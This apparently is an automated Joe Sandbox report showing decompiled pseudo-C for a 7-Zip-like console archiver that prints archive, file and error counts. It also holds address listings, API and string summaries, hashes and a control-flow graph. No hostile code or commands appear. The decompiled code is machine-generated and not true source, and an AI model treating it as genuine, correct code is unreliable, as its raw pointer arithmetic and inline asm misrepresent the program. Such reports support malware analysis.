					 *(_t572 - 0x58) = _t570;
					if(_t570 != _t565) {
						 *((intOrPtr*)( *_t570 + 4))(_t570);
					}
					_t41 = _t570 + 0xdc; // 0xdc
					 *((char*)(_t570 + 0xda)) =  *((intOrPtr*)(_t572 - 0x2e8));
					 *(_t572 - 4) = 0x10;
					L00B12F78(_t41, _t572 - 0x2e4);
					 *((char*)(_t570 + 0xd9)) = E00B4A0AB(_t570,  *0xb9a894,  *0xb9a898,  *((intOrPtr*)(_t572 - 0x18))) & 0xffffff00 |  *((intOrPtr*)(_t572 - 0x74)) - 0x00000001 > 0x00000000;
					 *((intOrPtr*)(_t570 + 0x168)) =  *((intOrPtr*)(_t572 - 0x114));
					 *(_t570 + 0x164) =  *(_t572 - 0x1c);
					if( *((intOrPtr*)(_t572 - 0x18)) != _t565) {
						_t405 =  *(_t572 - 0x14) - 1;
						_t585 = _t405;
						 *((intOrPtr*)(_t570 + 0xc4)) = _t405;
					}
					L00B49B35(_t572 - 0x38c, _t585);
					_push(_t572 - 0x298);
					 *(_t572 - 4) = 0x11;
					E00B4AD72(_t572 - 0x38c);
					 *((char*)(_t572 - 0x350)) =  *((intOrPtr*)(_t572 - 0x33a));
					_t298 =  *((intOrPtr*)(_t572 - 0x337));
					 *(_t572 - 0x34e) = _t298;
					 *(_t572 - 0x34f) = _t298;
					 *((char*)(_t572 - 0x34d)) = _t298 & 0xffffff00 |  *((intOrPtr*)(_t572 - 0x2f8)) == 0x00000003;
					E00B22722(_t572 - 0x34c, _t572 - 0x2a4);
					E00B12D90(_t572 - 0x54);
					 *(_t572 - 4) = 0x12;
					L00B3315C(_t572 - 0x3ec);
					 *(_t572 - 4) = 0x13;
					 *(_t572 - 0x1c) = _t565;
					if( *((intOrPtr*)(_t572 - 0x2d4)) != _t565) {
						 *(_t572 - 0x1c) = _t572 - 0x3ec;
						_push(_t572 - 0x2d8);
						E00B4A7A1(E00B3255B(_t572 - 0x3ec));
					}
					_push(_t572 - 0xb4);
					_push(_t572 - 0x54);
					_push( *(_t572 - 0x1c));
					_t86 = _t570 + 4; // 0x4
					asm("sbb ecx, ecx");
					_push(_t570);
					_push( ~_t570 & _t86);
					asm("sbb edx, edx");
					_t87 = _t570 + 0x10; // 0x10
					_push( ~_t570 & _t87);
					_push(_t572 - 0x38c);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t572 - 0x314)))) + 0xc);
					_push(_t572 - 0x38);
					_push(_t572 - 0x78);
					_push(_t572 - 0xcc);
					_t310 = E00B30E95( *((intOrPtr*)(_t572 - 0x2c)), _t572 - 0xc0); // executed
					 *((intOrPtr*)(_t572 - 0x20)) = _t310;
					if( *((intOrPtr*)(_t570 + 0xbc)) != _t565) {
						_t96 = _t570 + 0x18; // 0x18
						E00B4B618(_t96, _t565, 1);
					}
					if( *(_t572 - 0x50) != _t565) {
						_t392 =  *0xb9a898; // 0xb9a5a0
						_t590 = _t392 - _t565;
						if(_t392 != _t565) {
							 *(_t572 - 0x14) = _t392;
							E00B11FE9(_t392);
							fputs("ERROR:",  *( *(_t572 - 0x14)));
							E00B11FE9( *(_t572 - 0x14));
							_push( *((intOrPtr*)(_t572 - 0x54)));
							E00B11FE9(L00B11FFC( *(_t572 - 0x14), _t590));
						}
						if( *((intOrPtr*)(_t572 - 0x20)) == _t565) {
							 *((intOrPtr*)(_t572 - 0x20)) = 0x80004005;
						}
					}
					_t567 =  *0xb9a894; // 0xb9a5b0
					 *(_t572 - 0xd) =  *(_t572 - 0xd) & 0x00000000;
					if(_t567 != 0) {
						E00B11FE9(_t567);
						if( *((intOrPtr*)(_t570 + 0x114)) > 0 ||  *((intOrPtr*)(_t570 + 0x110)) > 1) {
							fputs("Archives: ",  *_t567);
							_t109 = _t570 + 0x110; // 0x110
							E00B11FE9(E00B1224A(_t567,  *_t109,  *((intOrPtr*)(_t109 + 4))));
							fputs("OK archives: ",  *_t567);
							E00B11FE9(E00B1224A(_t567,  *((intOrPtr*)(_t570 + 0x120)),  *((intOrPtr*)(_t570 + 0x124))));
						}
					}
					if(( *(_t570 + 0x128) |  *(_t570 + 0x12c)) != 0) {
						 *(_t572 - 0xd) = 1;
						if(_t567 != 0) {
							fputs("Can\'t open as archive: ",  *_t567);
							E00B11FE9(E00B1224A(_t567,  *(_t570 + 0x128),  *(_t570 + 0x12c)));
						}
					}
					if(( *(_t570 + 0x130) |  *(_t570 + 0x134)) == 0) {
						L35:
						if(_t567 != 0) {
							_t124 = _t570 + 0x138; // 0x138
							if(( *(_t570 + 0x138) |  *(_t124 + 4)) != 0) {
								fputs("Archives with Warnings: ",  *_t567);
								_t126 = _t570 + 0x138; // 0x138
								E00B11FE9(E00B1224A(_t567,  *_t126,  *((intOrPtr*)(_t126 + 4))));
							}
							if(( *(_t570 + 0x148) |  *(_t570 + 0x14c)) != 0) {
								E00B11FE9(_t567);
								if(( *(_t570 + 0x148) |  *(_t570 + 0x14c)) != 0) {
									fputs("Warnings: ",  *_t567);
									E00B11FE9(E00B1224A(_t567,  *(_t570 + 0x148),  *(_t570 + 0x14c)));
								}
							}
						}
						goto L41;
					} else {
						 *(_t572 - 0xd) = 1;
						if(_t567 == 0) {
							L41:
							if(( *(_t570 + 0x140) |  *(_t570 + 0x144)) == 0) {
								L45:
								if( *(_t572 - 0xd) == 0) {
									L47:
									if(_t567 == 0) {
										L63:
										 *(_t572 - 4) = 0x12;
										E00B11E89(L00B331CA(_t572 - 0x3ec),  *((intOrPtr*)(_t572 - 0x54)));
										 *(_t572 - 4) = 0x14;
										L00B4AF38(_t572 - 0x34c);
										 *(_t572 - 4) = 0x10;
										L00B49BB1(_t572 - 0x38c);
										 *(_t572 - 4) = 0xc;
										if(_t570 != 0) {
											 *((intOrPtr*)( *_t570 + 8))(_t570);
										}
										goto L74;
									}
									if(( *(_t570 + 0x130) |  *(_t570 + 0x134)) != 0) {
										L61:
										E00B11FE9(_t567);
										_t177 = _t570 + 0x150; // 0x150
										_t326 = _t177;
										__eflags =  *(_t570 + 0x150) |  *(_t326 + 4);
										if(( *(_t570 + 0x150) |  *(_t326 + 4)) != 0) {
											fputs("Sub items Errors: ",  *_t567);
											_t179 = _t570 + 0x150; // 0x150
											E00B11FE9(E00B1224A(_t567,  *_t179,  *((intOrPtr*)(_t179 + 4))));
										}
										goto L63;
									}
									_t146 = _t570 + 0x150; // 0x150
									if(( *(_t570 + 0x150) |  *(_t146 + 4)) != 0) {
										goto L61;
									}
									if( *((intOrPtr*)(_t572 - 0x20)) == 0) {
										_t332 =  *(_t572 - 0x94);
										if((_t332 |  *(_t572 - 0x90)) != 0) {
											fputs("Folders: ",  *_t567);
											E00B11FE9(E00B1224A(_t567,  *(_t572 - 0x94),  *(_t572 - 0x90)));
											_t332 =  *(_t572 - 0x94);
										}
										if( *(_t572 - 0x8c) != 1 ||  *(_t572 - 0x88) != 0 || (_t332 |  *(_t572 - 0x90)) != 0 || ( *(_t572 - 0x84) |  *(_t572 - 0x80)) != 0) {
											fputs("Files: ",  *_t567); // executed
											_t334 = E00B1224A(_t567,  *(_t572 - 0x8c),  *(_t572 - 0x88)); // executed
											E00B11FE9(_t334);
											if(( *(_t572 - 0x84) |  *(_t572 - 0x80)) != 0) {
												fputs("Alternate Streams: ",  *_t567);
												E00B11FE9(E00B1224A(_t567,  *(_t572 - 0x84),  *(_t572 - 0x80)));
												fputs("Alternate Streams Size: ",  *_t567);
												E00B11FE9(E00B1224A(_t567,  *(_t572 - 0xa4),  *(_t572 - 0xa0)));
											}
										}
										fputs("Size:       ",  *_t567); // executed
										_t339 = E00B1224A(_t567,  *(_t572 - 0xac),  *(_t572 - 0xa8)); // executed
										 *(_t572 - 0x24) = _t339;
										E00B11FE9(_t339);
										fputs("Compressed: ",  *( *(_t572 - 0x24))); // executed
										_t343 = E00B1224A( *(_t572 - 0x24),  *(_t572 - 0x9c),  *(_t572 - 0x98)); // executed
										E00B11FE9(_t343);
										if( *(_t572 - 0x1c) != 0) {
											E00B11FE9(_t567);
											L00B45F3D(_t567, _t572 - 0x3ec);
										}
									}
									goto L63;
								}
								L46:
								 *((intOrPtr*)(_t572 - 0x28)) = 2;
								goto L47;
							}
							 *(_t572 - 0xd) = 1;
							if(_t567 == 0) {
								goto L46;
							}
							E00B11FE9(_t567);
							if(( *(_t570 + 0x140) |  *(_t570 + 0x144)) == 0) {
								goto L46;
							}
							fputs("Open Errors: ",  *_t567);
							E00B11FE9(E00B1224A(_t567,  *(_t570 + 0x140),  *(_t570 + 0x144)));
							goto L45;
						}
						fputs("Archives with Errors: ",  *_t567);
						E00B11FE9(E00B1224A(_t567,  *(_t570 + 0x130),  *(_t570 + 0x134)));
						goto L35;
					}
				}
			}

























                                                                                                                    0x00b4925b
                                                                                                                    0x00b4925b
                                                                                                                    0x00b4925b
                                                                                                                    0x00b49262
                                                                                                                    0x00b49264
                                                                                                                    0x00b4926d
                                                                                                                    0x00b49273
                                                                                                                    0x00b49273
                                                                                                                    0x00b4927e
                                                                                                                    0x00b49284
                                                                                                                    0x00b4928a
                                                                                                                    0x00b49290
                                                                                                                    0x00b49296
                                                                                                                    0x00b4929c
                                                                                                                    0x00b492a2
                                                                                                                    0x00b492a8
                                                                                                                    0x00b492ae
                                                                                                                    0x00b492b4
                                                                                                                    0x00b492ba
                                                                                                                    0x00b492c0
                                                                                                                    0x00b492c3
                                                                                                                    0x00b492cb
                                                                                                                    0x00b492d8
                                                                                                                    0x00b492df
                                                                                                                    0x00b492e3
                                                                                                                    0x00b492e7
                                                                                                                    0x00b492e8
                                                                                                                    0x00b492ef
                                                                                                                    0x00b492f3
                                                                                                                    0x00b492f8
                                                                                                                    0x00b492fb
                                                                                                                    0x00b49302
                                                                                                                    0x00b4930e
                                                                                                                    0x00b49318
                                                                                                                    0x00b49318
                                                                                                                    0x00b49320
                                                                                                                    0x00b49337
                                                                                                                    0x00b49338
                                                                                                                    0x00b49338
                                                                                                                    0x00b49343
                                                                                                                    0x00b49347
                                                                                                                    0x00b4934f
                                                                                                                    0x00b49a3a
                                                                                                                    0x00b49a3d
                                                                                                                    0x00b49a41
                                                                                                                    0x00b49a49
                                                                                                                    0x00b49a4d
                                                                                                                    0x00b49a59
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a64
                                                                                                                    0x00b49a77
                                                                                                                    0x00b49a7d
                                                                                                                    0x00b49a87
                                                                                                                    0x00b49a8c
                                                                                                                    0x00b49a8f
                                                                                                                    0x00b49a93
                                                                                                                    0x00b49a95
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49a9a
                                                                                                                    0x00b49aa3
                                                                                                                    0x00b49aa7
                                                                                                                    0x00b49ab3
                                                                                                                    0x00b49ab8
                                                                                                                    0x00b49ac2
                                                                                                                    0x00b49ac7
                                                                                                                    0x00b49ace
                                                                                                                    0x00b49ad3
                                                                                                                    0x00b49adc
                                                                                                                    0x00b49ae4
                                                                                                                    0x00b49ae4
                                                                                                                    0x00b49359
                                                                                                                    0x00b49934
                                                                                                                    0x00b49938
                                                                                                                    0x00b4993f
                                                                                                                    0x00b49946
                                                                                                                    0x00b4994f
                                                                                                                    0x00b49956
                                                                                                                    0x00b4995f
                                                                                                                    0x00b49960
                                                                                                                    0x00b49963
                                                                                                                    0x00b49969
                                                                                                                    0x00b4996c
                                                                                                                    0x00b4996f
                                                                                                                    0x00b49974
                                                                                                                    0x00b49980
                                                                                                                    0x00b49984
                                                                                                                    0x00b4998d
                                                                                                                    0x00b49993
                                                                                                                    0x00b49997
                                                                                                                    0x00b4999e
                                                                                                                    0x00b499a4
                                                                                                                    0x00b499ab
                                                                                                                    0x00b499ac
                                                                                                                    0x00b499b1
                                                                                                                    0x00b499b8
                                                                                                                    0x00b499c0
                                                                                                                    0x00b499f6
                                                                                                                    0x00b499f6
                                                                                                                    0x00b499f9
                                                                                                                    0x00b49a00
                                                                                                                    0x00b49a00
                                                                                                                    0x00b49a07
                                                                                                                    0x00b49a0b
                                                                                                                    0x00b49a1b
                                                                                                                    0x00b49a2e
                                                                                                                    0x00b49a2e
                                                                                                                    0x00b49a33
                                                                                                                    0x00000000
                                                                                                                    0x00b49a33
                                                                                                                    0x00b499fb
                                                                                                                    0x00b499fe
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b499fe
                                                                                                                    0x00b499c2
                                                                                                                    0x00b499c5
                                                                                                                    0x00b499cc
                                                                                                                    0x00b499ce
                                                                                                                    0x00b499de
                                                                                                                    0x00b499f1
                                                                                                                    0x00000000
                                                                                                                    0x00b499f1
                                                                                                                    0x00b499c7
                                                                                                                    0x00b499ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4935f
                                                                                                                    0x00b4935f
                                                                                                                    0x00b49364
                                                                                                                    0x00b4936a
                                                                                                                    0x00b4936d
                                                                                                                    0x00b4936f
                                                                                                                    0x00b49373
                                                                                                                    0x00b49380
                                                                                                                    0x00b49380
                                                                                                                    0x00b49375
                                                                                                                    0x00b4937c
                                                                                                                    0x00b4937c
                                                                                                                    0x00b49384
                                                                                                                    0x00b49388
                                                                                                                    0x00b4938b
                                                                                                                    0x00b49390
                                                                                                                    0x00b49390
                                                                                                                    0x00b49399
                                                                                                                    0x00b4939f
                                                                                                                    0x00b493ac
                                                                                                                    0x00b493b0
                                                                                                                    0x00b493d5
                                                                                                                    0x00b493e1
                                                                                                                    0x00b493ea
                                                                                                                    0x00b493f0
                                                                                                                    0x00b493f5
                                                                                                                    0x00b493f5
                                                                                                                    0x00b493f6
                                                                                                                    0x00b493f6
                                                                                                                    0x00b49402
                                                                                                                    0x00b49413
                                                                                                                    0x00b49414
                                                                                                                    0x00b49418
                                                                                                                    0x00b4942a
                                                                                                                    0x00b49430
                                                                                                                    0x00b49436
                                                                                                                    0x00b4943c
                                                                                                                    0x00b49445
                                                                                                                    0x00b49458
                                                                                                                    0x00b49460
                                                                                                                    0x00b4946b
                                                                                                                    0x00b4946f
                                                                                                                    0x00b4947a
                                                                                                                    0x00b4947e
                                                                                                                    0x00b49481
                                                                                                                    0x00b4948f
                                                                                                                    0x00b49498
                                                                                                                    0x00b494a0
                                                                                                                    0x00b494a0
                                                                                                                    0x00b494b1
                                                                                                                    0x00b494b5
                                                                                                                    0x00b494b8
                                                                                                                    0x00b494bb
                                                                                                                    0x00b494c0
                                                                                                                    0x00b494c8
                                                                                                                    0x00b494c9
                                                                                                                    0x00b494cc
                                                                                                                    0x00b494ce
                                                                                                                    0x00b494d9
                                                                                                                    0x00b494dd
                                                                                                                    0x00b494de
                                                                                                                    0x00b494e5
                                                                                                                    0x00b494e9
                                                                                                                    0x00b494f0
                                                                                                                    0x00b494f7
                                                                                                                    0x00b49502
                                                                                                                    0x00b49505
                                                                                                                    0x00b49509
                                                                                                                    0x00b4950c
                                                                                                                    0x00b4950c
                                                                                                                    0x00b49514
                                                                                                                    0x00b49516
                                                                                                                    0x00b4951b
                                                                                                                    0x00b4951d
                                                                                                                    0x00b49521
                                                                                                                    0x00b49524
                                                                                                                    0x00b49533
                                                                                                                    0x00b4953a
                                                                                                                    0x00b49542
                                                                                                                    0x00b4954c
                                                                                                                    0x00b4954c
                                                                                                                    0x00b49554
                                                                                                                    0x00b49556
                                                                                                                    0x00b49556
                                                                                                                    0x00b49554
                                                                                                                    0x00b4955d
                                                                                                                    0x00b49563
                                                                                                                    0x00b49569
                                                                                                                    0x00b4956d
                                                                                                                    0x00b49579
                                                                                                                    0x00b4958b
                                                                                                                    0x00b4958e
                                                                                                                    0x00b495a3
                                                                                                                    0x00b495af
                                                                                                                    0x00b495c8
                                                                                                                    0x00b495c8
                                                                                                                    0x00b49579
                                                                                                                    0x00b495d9
                                                                                                                    0x00b495dd
                                                                                                                    0x00b495e1
                                                                                                                    0x00b495ea
                                                                                                                    0x00b49603
                                                                                                                    0x00b49603
                                                                                                                    0x00b495e1
                                                                                                                    0x00b49614
                                                                                                                    0x00b49647
                                                                                                                    0x00b49649
                                                                                                                    0x00b49651
                                                                                                                    0x00b4965a
                                                                                                                    0x00b49663
                                                                                                                    0x00b49666
                                                                                                                    0x00b4967b
                                                                                                                    0x00b4967b
                                                                                                                    0x00b4968c
                                                                                                                    0x00b49690
                                                                                                                    0x00b496a1
                                                                                                                    0x00b496aa
                                                                                                                    0x00b496c3
                                                                                                                    0x00b496c3
                                                                                                                    0x00b496a1
                                                                                                                    0x00b4968c
                                                                                                                    0x00000000
                                                                                                                    0x00b49616
                                                                                                                    0x00b49618
                                                                                                                    0x00b4961c
                                                                                                                    0x00b496c8
                                                                                                                    0x00b496d4
                                                                                                                    0x00b49718
                                                                                                                    0x00b4971c
                                                                                                                    0x00b49725
                                                                                                                    0x00b49727
                                                                                                                    0x00b498de
                                                                                                                    0x00b498e4
                                                                                                                    0x00b498f0
                                                                                                                    0x00b498fc
                                                                                                                    0x00b49900
                                                                                                                    0x00b4990b
                                                                                                                    0x00b4990f
                                                                                                                    0x00b49916
                                                                                                                    0x00b4991a
                                                                                                                    0x00b49923
                                                                                                                    0x00b49923
                                                                                                                    0x00000000
                                                                                                                    0x00b4991a
                                                                                                                    0x00b49739
                                                                                                                    0x00b498a2
                                                                                                                    0x00b498a4
                                                                                                                    0x00b498af
                                                                                                                    0x00b498af
                                                                                                                    0x00b498b5
                                                                                                                    0x00b498b8
                                                                                                                    0x00b498c1
                                                                                                                    0x00b498c4
                                                                                                                    0x00b498d9
                                                                                                                    0x00b498d9
                                                                                                                    0x00000000
                                                                                                                    0x00b498b8
                                                                                                                    0x00b49745
                                                                                                                    0x00b4974e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b49758
                                                                                                                    0x00b4975e
                                                                                                                    0x00b4976c
                                                                                                                    0x00b49775
                                                                                                                    0x00b4978e
                                                                                                                    0x00b49793
                                                                                                                    0x00b49793
                                                                                                                    0x00b497a0
                                                                                                                    0x00b497c5
                                                                                                                    0x00b497d7
                                                                                                                    0x00b497de
                                                                                                                    0x00b497ec
                                                                                                                    0x00b497f5
                                                                                                                    0x00b4980b
                                                                                                                    0x00b49817
                                                                                                                    0x00b49830
                                                                                                                    0x00b49830
                                                                                                                    0x00b497ec
                                                                                                                    0x00b4983c
                                                                                                                    0x00b4984e
                                                                                                                    0x00b49855
                                                                                                                    0x00b49858
                                                                                                                    0x00b49867
                                                                                                                    0x00b4987a
                                                                                                                    0x00b49881
                                                                                                                    0x00b4988a
                                                                                                                    0x00b4988e
                                                                                                                    0x00b4989b
                                                                                                                    0x00b4989b
                                                                                                                    0x00b4988a
                                                                                                                    0x00000000
                                                                                                                    0x00b49758
                                                                                                                    0x00b4971e
                                                                                                                    0x00b4971e
                                                                                                                    0x00000000
                                                                                                                    0x00b4971e
                                                                                                                    0x00b496d8
                                                                                                                    0x00b496dc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b496e0
                                                                                                                    0x00b496f1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b496fa
                                                                                                                    0x00b49713
                                                                                                                    0x00000000
                                                                                                                    0x00b49713
                                                                                                                    0x00b49629
                                                                                                                    0x00b49642
                                                                                                                    0x00000000
                                                                                                                    0x00b49642
                                                                                                                    0x00b49614

                                                                                                                    APIs
                                                                                                                    • fputs.MSVCRT(Scanning the drive for archives:), ref: 00B4926D
                                                                                                                      • Part of subcall function 00B11FE9: fputc.MSVCRT ref: 00B11FF0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputcfputs
                                                                                                                    • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $3"$S
                                                                                                                    • API String ID: 269475090-2029757534
                                                                                                                    • Opcode ID: 80dea30092221a1be48c870579141b121d699371c56c36a389117144a506ac45
                                                                                                                    • Instruction ID: 53bc3fea7bfbe49a7f44c8b2dbe1f68fee473b55618b282198cca582efe65567
                                                                                                                    • Opcode Fuzzy Hash: 80dea30092221a1be48c870579141b121d699371c56c36a389117144a506ac45
                                                                                                                    • Instruction Fuzzy Hash: 682259319052589FDF26EBA4C896BEDBBF5EF44300F1444DAE04A672A1DB706B84DF21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4876C Relevance: 44.3, APIs: 16, Strings: 9, Instructions: 569COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 478 b4876c-b4877f call b4a3e5 481 b48781-b4878d call b11ffc 478->481 482 b48792-b487ad call b20c42 478->482 481->482 486 b487be-b487c7 482->486 487 b487af-b487b9 482->487 488 b487d7 486->488 489 b487c9-b487d5 486->489 487->486 490 b487da-b487e4 488->490 489->488 489->490 491 b48804-b48833 call b11e55 call b49ae5 490->491 492 b487e6-b487fb GetStdHandle GetConsoleScreenBufferInfo 490->492 500 b48835-b48837 491->500 501 b4883b-b48861 call b36946 call b4a7a1 call b35de6 491->501 492->491 493 b487fd-b48801 492->493 493->491 500->501 507 b48866-b48877 call b207aa 501->507 510 b48879-b4887b 507->510 511 b488ab-b488d7 call b3cb95 507->511 512 b48895-b488a6 _CxxThrowException 510->512 513 b4887d-b48884 510->513 518 b488ef-b4890d 511->518 519 b488d9-b488ea _CxxThrowException 511->519 512->511 513->512 515 b48886-b48893 call b207ce 513->515 515->511 515->512 520 b4890f-b48933 call b36bd5 518->520 521 b48969-b48984 518->521 519->518 528 b48a29-b48a3a _CxxThrowException 520->528 529 b48939-b4893d 520->529 526 b48986 521->526 527 b4898b-b489d3 call b11fe9 fputs call b11fe9 strlen * 2 521->527 526->527 539 b48c54-b48c7c call b11fe9 fputs call b11fe9 527->539 540 b489d9-b48a13 fputs fputc 527->540 532 b48a3f 528->532 529->528 531 b48943-b48967 call b4aeab call b11e89 529->531 531->520 531->521 535 b48a41-b48a54 532->535 543 b48a15-b48a1f 535->543 544 b48a56-b48a62 535->544 554 b48c82 539->554 555 b48d3b-b48d63 call b11fe9 fputs call b11fe9 539->555 540->543 540->544 543->532 547 b48a21-b48a27 543->547 552 b48a64-b48a6c 544->552 553 b48ab0-b48ae0 call b4a4b1 call b12d90 544->553 547->535 556 b48a6e-b48a79 552->556 557 b48a9a-b48aaf call b12221 552->557 591 b48ae2-b48ae6 553->591 592 b48b3f-b48b57 call b4a4b1 553->592 560 b48c89-b48c9e call b4a484 554->560 578 b49a52-b49a59 555->578 579 b48d69 555->579 562 b48a83 556->562 563 b48a7b-b48a81 556->563 557->553 575 b48ca0-b48ca8 560->575 576 b48caa-b48cad call b12221 560->576 564 b48a85-b48a98 562->564 563->564 564->556 564->557 581 b48cb2-b48d35 call b4ac18 fputs call b11fe9 575->581 576->581 582 b49a69-b49a95 call b4a7a1 call b11e89 call b32046 578->582 583 b49a5b-b49a62 578->583 584 b48d70-b48dcc call b4a484 call b4a41d call b4ac18 fputs call b11fe9 579->584 581->555 581->560 619 b49a97-b49a99 582->619 620 b49a9d-b49ae4 call b11e89 call b111c2 call b4ac40 call b41b84 582->620 583->582 588 b49a64 call b4a7bc 583->588 660 b48dce 584->660 588->582 597 b48af0-b48b0c call b13171 591->597 598 b48ae8-b48aeb call b130ea 591->598 616 b48b59-b48b79 fputs call b12221 592->616 617 b48b7a-b48b82 592->617 611 b48b34-b48b3d 597->611 612 b48b0e-b48b2f call b131ad call b13171 call b11089 597->612 598->597 611->591 611->592 612->611 616->617 623 b48c2e-b48c4e call b11fe9 call b11e89 617->623 624 b48b88-b48b8c 617->624 619->620 623->539 623->540 630 b48b9d-b48bb1 624->630 631 b48b8e-b48b9c fputs 624->631 641 b48bb3-b48bb7 630->641 642 b48c1f-b48c28 630->642 631->630 648 b48bc4-b48bce 641->648 649 b48bb9-b48bc3 641->649 642->623 642->624 650 b48bd4-b48be0 648->650 651 b48bd0-b48bd2 648->651 649->648 657 b48be7 650->657 658 b48be2-b48be5 650->658 651->650 656 b48c07-b48c1d 651->656 656->641 656->642 663 b48bea-b48bfd 657->663 658->663 660->578 670 b48c04 663->670 671 b48bff-b48c02 663->671 670->656 671->656
                                                                                                                    C-Code - Quality: 75%
                                                                                                                    			E00B4876C(char* __ebx, signed int __edi, signed int __esi) {
				intOrPtr _t590;
				signed int _t591;
				signed char _t597;
				struct _IO_FILE** _t601;
				void* _t603;
				char* _t604;
				intOrPtr* _t612;
				char* _t617;
				char* _t628;
				signed char _t637;
				signed int _t641;
				signed int _t649;
				char* _t661;
				void* _t677;
				void* _t682;
				signed int _t683;
				void* _t685;
				struct _IO_FILE** _t690;
				void* _t694;
				void* _t716;
				signed char _t743;
				signed char _t756;
				signed char _t771;
				struct _IO_FILE** _t786;
				signed char _t795;
				signed int _t797;
				struct _IO_FILE** _t798;
				char* _t818;
				signed char _t819;
				signed char _t829;
				char* _t831;
				struct _IO_FILE** _t833;
				int _t839;
				signed int _t858;
				signed int _t864;
				signed int _t870;
				void* _t899;
				struct _IO_FILE** _t903;
				signed char _t907;
				unsigned int _t908;
				unsigned int _t909;
				signed char _t910;
				signed int _t914;
				signed int _t936;
				signed char _t938;
				signed int _t942;
				signed char _t944;
				struct _IO_FILE** _t951;
				void* _t954;
				struct _IO_FILE** _t956;
				struct _IO_FILE** _t958;
				void* _t960;
				int _t966;
				void* _t972;
				struct _IO_FILE* _t973;
				signed int _t974;
				struct _IO_FILE** _t1144;
				signed char _t1157;
				signed char _t1234;
				signed char _t1237;
				signed int _t1246;
				void* _t1257;
				signed int _t1269;
				intOrPtr* _t1270;
				struct _IO_FILE** _t1273;
				signed int _t1274;
				signed int _t1276;
				signed int _t1277;
				signed char _t1280;
				struct _IO_FILE** _t1282;
				signed int _t1283;
				struct _IO_FILE** _t1284;
				signed int _t1285;
				void* _t1286;
				intOrPtr* _t1288;
				void* _t1310;
				unsigned int _t1319;
				void* _t1342;
				void* _t1344;

				_t1276 = __esi;
				_t1269 = __edi;
				_t970 = __ebx;
				_t974 =  *0xb9a894; // 0xb9a5b0
				E00B4A3E5(_t974, 0);
				_t1291 =  *((intOrPtr*)(_t1286 - 0xd8)) - __ebx;
				if( *((intOrPtr*)(_t1286 - 0xd8)) != __ebx) {
					_push( *((intOrPtr*)(_t1286 - 0xdc)));
					_t1246 =  *0xb9a894; // 0xb9a5b0
					L00B11FFC(_t1246, _t1291);
				}
				E00B20C42(_t970, _t1286 - 0x108, _t1269, _t1276, _t1286 - 0x340); // executed
				_t590 =  *((intOrPtr*)(_t1286 - 0x318));
				if(_t590 != 0xffffffff) {
					 *0xb9a5b8 = _t590;
					 *0xb9a5a8 = _t590;
					 *0xb9a59c = _t590;
				}
				 *(_t1286 - 0x1c) = _t1269;
				if( *((intOrPtr*)(_t1286 - 0x114)) == _t970 ||  *((intOrPtr*)(_t1286 - 0x118)) !=  *((intOrPtr*)(_t1286 - 0x120))) {
					 *(_t1286 - 0x1c) = _t1276;
				}
				 *(_t1286 - 0x14) = 0x50;
				if( *(_t1286 - 0x18) != _t970) {
					_t966 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5), _t1286 - 0x44); // executed
					if(_t966 != 0) {
						 *(_t1286 - 0x14) =  *(_t1286 - 0x44) & 0x0000ffff;
					}
				}
				_push(0x18);
				_t591 = E00B11E55();
				 *(_t1286 - 0x58) = _t591;
				 *(_t1286 - 4) = 5;
				if(_t591 == _t970) {
					_t1270 = 0;
					__eflags = 0;
				} else {
					_t1270 = L00B49AE5(_t591);
				}
				_t1298 = _t1270 - _t970;
				 *((intOrPtr*)(_t1286 - 0x2c)) = _t1270;
				 *(_t1286 - 4) = 4;
				 *((intOrPtr*)(_t1286 - 0xd0)) = _t1270;
				if(_t1270 != _t970) {
					 *((intOrPtr*)( *_t1270 + 4))(_t1270);
				}
				 *((char*)(_t1270 + 0x14)) =  *((intOrPtr*)(_t1286 - 0x33f));
				 *(_t1286 - 4) = 6;
				 *((char*)(_t1270 + 0x15)) =  *((intOrPtr*)(_t1286 - 0x33e));
				E00B4A7A1(E00B36946(_t970, _t1270, _t1270, _t1298));
				E00B35DE6(_t1270, _t1298); // executed
				_t597 = E00B207AA(_t1286 - 0x2f8);
				 *(_t1286 - 0xd) = _t597;
				if( *((intOrPtr*)(_t1270 + 0xc)) != _t970) {
					L20:
					 *(_t1286 - 0xc0) = _t970;
					 *(_t1286 - 0xbc) = _t970;
					 *(_t1286 - 0xb8) = _t970;
					_t1248 = _t1286 - 0x138;
					_push(_t1286 - 0xc0);
					 *(_t1286 - 4) = 7;
					if(E00B3CB95(_t1270, _t1248, _t1302) == 0) {
						_t956 =  *0xb8d3e4; // 0xb8d3e8
						_push(0xb90ad8);
						 *(_t1286 - 0x24) = _t956;
						_push(_t1286 - 0x24);
						L00B7F160();
					}
